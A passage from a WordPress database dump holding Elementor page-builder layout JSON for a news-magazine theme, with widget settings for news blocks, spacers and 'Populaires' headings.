"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"q73qhhi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":15},\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":3},\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.4},\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1369,479,'_elementor_version','0.4'),(1370,479,'_elementor_css','a:3:{s:4:\"time\";i:1508914169;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1372,480,'_elementor_edit_mode','builder'),(1373,480,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"q73qhhi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":15},\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":3},\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list1_margin_bottom\":10,\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\"